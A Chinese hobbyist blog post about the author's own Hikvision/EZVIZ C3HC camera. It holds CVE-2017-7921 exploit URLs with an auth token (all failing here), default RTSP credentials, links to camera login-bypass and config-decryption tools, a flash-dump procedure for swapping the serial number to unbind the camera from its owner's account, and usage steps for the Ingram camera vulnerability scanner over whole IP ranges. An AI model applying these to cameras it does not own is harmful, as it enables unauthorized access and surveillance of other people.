海康萤石摄像头C3HC学习

更新于 分类于 阅读次数: 阅读时长 ≈ 14 分钟

网络摄像头从硬件到软件 [20240619翻车救护中, 25q八针脚的芯片被廉价编程器硬件弄伤两只脚后又被在我焊到主板的过程中彻底弄断,飞线失败,放弃救助该芯片;采购同信号芯片替换中…]

2024年6月11 新增章节:Flash芯片闪存内容编辑

CVE-2017-7921 海康威视(Hikvision)摄像头漏洞复现
https://www.cnblogs.com/yier-G/p/16632842.html
CVE-2021-36260漏洞复现
https://blog.csdn.net/qq_50854662/article/details/128700889
复现源代码:https://github.com/Cuerz/CVE-2021-36260

确定摄像头所在的IP地址段

网线连接到同一个路由器下,查看到路由器里面的DHCP客户端给摄像头分配了IP:192.168.2.218

CVE-2017-7921

http://192.168.2.218/Security/users?auth=YWRtaW46MTEK
Access Error: 405 – Method Not Allowed
Requested method GET not supported for URL: /Security/users

http://192.168.2.218/onvif-http/snapshot?auth=YWRtaW46MTEK
Access Error: 404 – Not Found
Can’t locate document: /onvif-http/snapshot

http://192.168.2.218/System/configurationFile?auth=YWRtaW46MTEK
Access Error: 405 – Method Not Allowed
Requested method GET not supported for URL: /System/configurationFile

CVE-2021-36260

Put result

1
2
3
4
5
6
7
8
9
10
11
12
13
<!DOCTYPE html>
<html>

<head>
    <title>Document Error: Not Found</title>
</head>

<body>
    <h2>Access Error: 404 -- Not Found</h2>
    <p>Can't open document: /mnt/mmc01/webPage/bic/ssoService/v1/applyCT</p>
</body>

</html>

RTSP 弱密码

主码流

rtsp://admin:12345@IP:554/h264/ch1/main/av_stream
rtsp://admin:12345@IP:554/MPEG-4/ch1/main/av_stream

子码流

rtsp://admin:12345@IP/mpeg4/ch1/sub/av_stream
rtsp://admin:12345@IP/h264/ch1/sub/av_stream

杂七杂八的随笔

多个海康摄像头 桥接
求大佬解答:
当面积很大的情况下(比如多个足球场),多个网络WIFI摄像头通过互相之间的桥接的方式,串成特定的网络拓扑;然后通过某个摄像头联网(局域网)来让手机(或电脑)可以查看所有这些WIFI网络摄像头的画面(或者连接到nvr)
有这种方案吗?或者技术上是怎么实现的?

开启设备的AP热点
(AP的SSID为EZVIZ_XXXXXXXXX,其中XXXXXXXXX为设备序列号;
AP的默认密码为EZVIZ_YYYYYY,其中YYYYYY为设备的验证码)

用1接1的链接方式,将第一个摄像头(已接入WIFI互联网)的开启热点adhoc,
第二个摄像头链接第一个摄像头的热点,(组成小火车厢相连接的结构),通过第一个摄像头的网络连接到互联网,也开启热点Adhoc。
第三个摄像头链接到第二个摄像头的热点,以此类推
20231007 确定了方案图纸,等待拍照获取序列号和验证码
- 抓包
- 社会工程

  1. 大华 DahuaLoginBypass
    Chrome extension that uses vulnerability CVE-2021-33044 to log in to Dahua IP cameras and VTH/VTO (video intercom) devices without authentication.

For other device types (NVR/DVR/XVR, etc), there exists CVE-2021-33045 which cannot be exploited with an ordinary web browser.

These vulnerabilities are likely to be fixed in firmware released after Sept 2021.
https://github.com/bp2008/DahuaLoginBypass

  1. 海康威视摄像头密码找回非重置

Hikvision IPC config preview tool
Requirements:

  • Firmware must be 5.4.4 or lower.
  • LAN access to camera

Instructions

https://github.com/WormChickenWizard/hikvision-decrypter

One you obtain the configuration file, simply load it into the program, decrypt it, and save it.Then you can use a hex editor to search for the passwords. At some point, I would like to implement the ability to read and edit the database from inside of the program.

Reference:
https://ipcamtalk.com/threads/hikvision-backdoor-ip-camera.46486/

C3HC如何查看摄像头admin密码?
海康C3HC, 第一次或着重置后连接,会有修改admin为新密码的步骤:修改密码
请将默认加密密码修改为新的加密密码,默认密码为设备验证码(6位大写字母),你可以在设备标签上找到它。
新密码:
修改后,请牢记你的新密码,若密码丢失,将不能被找回,需重置设备恢复初始值,确定要修改?

  1. 思路:找海康摄像头漏洞,针对漏洞进行分析和利用
    CVE-2017-7921 海康威视(Hikvision)摄像头漏洞复现
    https://www.cnblogs.com/yier-G/p/16632842.html

    CVE-2017-7921复现(解密文件)
    https://blog.csdn.net/qq_41617034/article/details/117521734

    海康摄像头CVE-2021-36260漏洞复现
    https://blog.csdn.net/qq_50854662/article/details/128700889
    复现源代码:https://github.com/Cuerz/CVE-2021-36260

肯定能找到漏洞复现;可是我无法连接到摄像头的网络,导致无法通信的尴尬!?

疑问:
1. 激活摄像头以后,热点的密码就变为激活密码了吗?
2. 用网线连接后,可否找到IP?
3. C3HC是否有这个漏洞?可否下载configurationFile;

思路2,问问个人卖家;这样专业的实践知识有时Google很难及时收录。

得到确认:WIFI和AP热点模式是不可能同时开启的!
20231011 C3HC大概率有这两个漏洞:
搜索: C3HC 固件升级; 搜索结构还在固件版本V5.3.2 build 200312

如何解绑定手机号
拆下flash,上编程器,修改序列号和验证码即可
具体视频:9号-10号,看了视频,丢失了链接
萤石云摄像头固件修改,更换SN解绑手机,解邦教程
https://tieba.baidu.com/p/8197423399

海康威视CVE-2017-7921的一次实战利用
https://cn-sec.com/archives/1788403.html

Flash芯片闪存内容编辑

image-20240611093951945

  1. 把flash芯片(型号 XMC 250H128CH10)取下来,上编程器(使用了CH341A编程器),读取到flash芯片中的固件文件

    1. 在此之前涉及到简易编程器采购,从拆解的摄像头主板上焊下flash芯片,芯片圆点位置(正极)对应烧录座的1号针脚,
    2. 以及2425_CH341A土豪金24/25编程器软件的驱动安装等;具体步骤搜索本站文章:PVE安装Windows7 》 运行CH341A编程器

    image-20240612074934788

  2. Hex Edit在线打开提取到的二进制bin文件,进一步编辑序列号和验证码

    1. 查找到三处序列号(一共9位ascii码字母数字组合,i.e. J1772)

      位置:00060040,00F40DC0,00FB0F20

      1. Note:该Bin文件中的这些序列号是转化为十六进制格式的ASCII码来保存的

    2. 查找到一处验证码(一共6位ascii码大写字母, i.e. UXT***)

      位置:00060010

    3. 修改到同型号全新的或拆机的序列号后保持导出,准备写入到flash芯片中

  3. 把新的bin文件,通过编程器写入到flash芯片中

    1. 加载新的bin文件后,点击”自动”;先是现实:正在擦除中…
    2. 自动跳转到:正在编程中…
    3. 如果正确识别到芯片的情况,自动操作时出现超时 错误等,可以尝试手动操作,如:擦除—查空—编程—效验,一步步操作解决

    image-20240612075825125

    擦除—查空—编程—效验: 擦除成功提示如下:

    image-20240612080437829

    查空成功提示如下:

    image-20240612080825294

    编程超时错误提示如下:

    这时在写入到10%(花费2分45秒左右)时提示超时失败

    image-20240612081607165

    不管换了两台机器(Win7虚拟机 和Win10的PC机),移除或使用USB延长线,只要用这个软件:“CH341A编程器”都会在写入过程中报超时错误

    最后花了3小时,才验证出这样的经验。切换到Neo Programmer 2.2.10 (2021/10/15)版本可以正常写入!

    image-20240612111744193

    编程成功提示如下:

    image-20240612164615621

  4. 焊接安装XMC25Q128闪存芯片到摄像头的主板上。

  5. 开机测试,萤石APP绑定新账号

NeoProgrammer V2.2.0.10

image-20240612120258664

image-20240613194943391

![image-20240613204904232](/Users/carlzeng/Library/Application Support/typora-user-images/image-20240613204904232.png)

Ingram

网络摄像头漏洞扫描工具 | Webcam vulnerability scanning tool

项目地址: https://github.com/jorhelp/Ingram/tree/master

主要针对网络摄像头的漏洞扫描框架,目前已集成海康、大华、宇视、dlink等常见设备

安装

请在 Linux 或 Mac 系统使用,确保安装了3.8及以上版本的Python,尽量不要使用3.11,因为对许多包的兼容不是很好

  • 克隆该仓库:
1
git clone https://github.com/jorhelp/Ingram.git
  • 进入项目目录,创建一个虚拟环境,并激活该环境:
1
2
3
4
cd Ingram
pip3 install virtualenv
python3 -m virtualenv venv
source venv/bin/activate
  • 安装依赖:
1
pip3 install -r requirements.txt

至此安装完毕!

运行

  • 由于是在虚拟环境中配置,所以,每次运行之前,请先激活虚拟环境:source venv/bin/activate
  • 你需要准备一个目标文件,比如 targets.txt,里面保存着你要扫描的 IP 地址,每行一个目标,具体格式如下:
1
2
3
4
5
6
7
8
9
10
11
12
13
# 你可以使用井号(#)来进行注释

# 单个的 IP 地址
192.168.0.1

# IP 地址以及要扫描的端口
192.168.0.2:80

# 带 '/' 的IP段
192.168.0.0/16

# 带 '-' 的IP段
192.168.0.0-192.168.255.255
  • 有了目标文件之后就可直接运行:
1
python3 run_ingram.py -i 你要扫描的文件 -o 输出文件夹
  • 端口: 如果target.txt文件中指定了目标的端口,比如: 192.168.6.6:8000,那么会扫描该目标的8000端口

否则的话,默认只扫描常见端口(定义在 Ingram/config.py 中),若要批量扫描其他端口,需自行指定,例如:

1
python3 run_ingram.py -i 你要扫描的文件 -o 输出文件夹 -p 80 81 8000
  • 默认并发数目为 300,可以根据机器配置及网速通过 -t 参数来自行调控:
1
python3 run_ingram.py -i 你要扫描的文件 -o 输出文件夹 -t 500
  • 支持中断恢复,不过并不会实时记录当前运行状态,而是间隔一定时间,所以并不能准确恢复到上次的运行状态。如果扫描因为网络或异常而中断,可以通过重复执行上次的扫描命令来继续扫描
  • 所有参数:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
optional arguments:
  -h, --help            show this help message and exit
  -i IN_FILE, --in_file IN_FILE
                        the targets will be scan
  -o OUT_DIR, --out_dir OUT_DIR
                        the dir where results will be saved
  -p PORTS [PORTS ...], --ports PORTS [PORTS ...]
                        the port(s) to detect
  -t TH_NUM, --th_num TH_NUM
                        the processes num
  -T TIMEOUT, --timeout TIMEOUT
                        requests timeout
  -D, --disable_snapshot
                        disable snapshot
  --debug

端口扫描器

  • 我们可以利用强大的端口扫描器来获取活动主机,进而缩小 Ingram 的扫描范围,提高运行速度,具体做法是将端口扫描器的结果文件整理成 ip:port 的格式,并作为 Ingram 的输入
  • 这里以 masscan 为例简单演示一下(masscan 的详细用法这里不再赘述),首先用 masscan 扫描 80 或 8000-8008 端口存活的主机:masscan -p80,8000-8008 -iL 目标文件 -oL 结果文件 --rate 8000
  • masscan 运行完之后,将结果文件整理一下:grep 'open' 结果文件 | awk '{printf"%s:%s\n", $4, $3}' > targets.txt
  • 之后对这些主机进行扫描:python run_ingram.py -i targets.txt -o out

实测

扫描测试ip段有发现摄像头:

1201755007382_.pic

运行:

591755004786_.pic

操作运行步骤:

671755005220_.pic

image-20250813103808493

配置Ingram字典文件

image-20250814165117197

海康摄像头通过Web插件进行预览播放和控制

必需使用IE浏览器; 安装插件后, 才能查看实时的海康摄像头或DVR画面;

插件文件名: WebComponents.exe

大小: 1.78MB

可能不同的固件使用不同的版本, 搜索官网上是

WebComponentsDownload
V3.0.8.23 |4.55MB |2023/02/08

https://www.hikvision.com/en/support/tools/hitools/cl07322df9f57a1ee1/

平台还有其他的工具 如:

VSPlayer_mac64Download

V2.0.2.3 |38.75MB |2025/01/03

VSPlayer plays the streams or recordings from Hikvision encoding devices in various formats, including H.264, Smart264, H.265, Smart265, SVAC, and MPEG4.

(请输入关键字以后回车,检索内容涵盖全局站点)

个性化需求沟通 扫客服加V加群: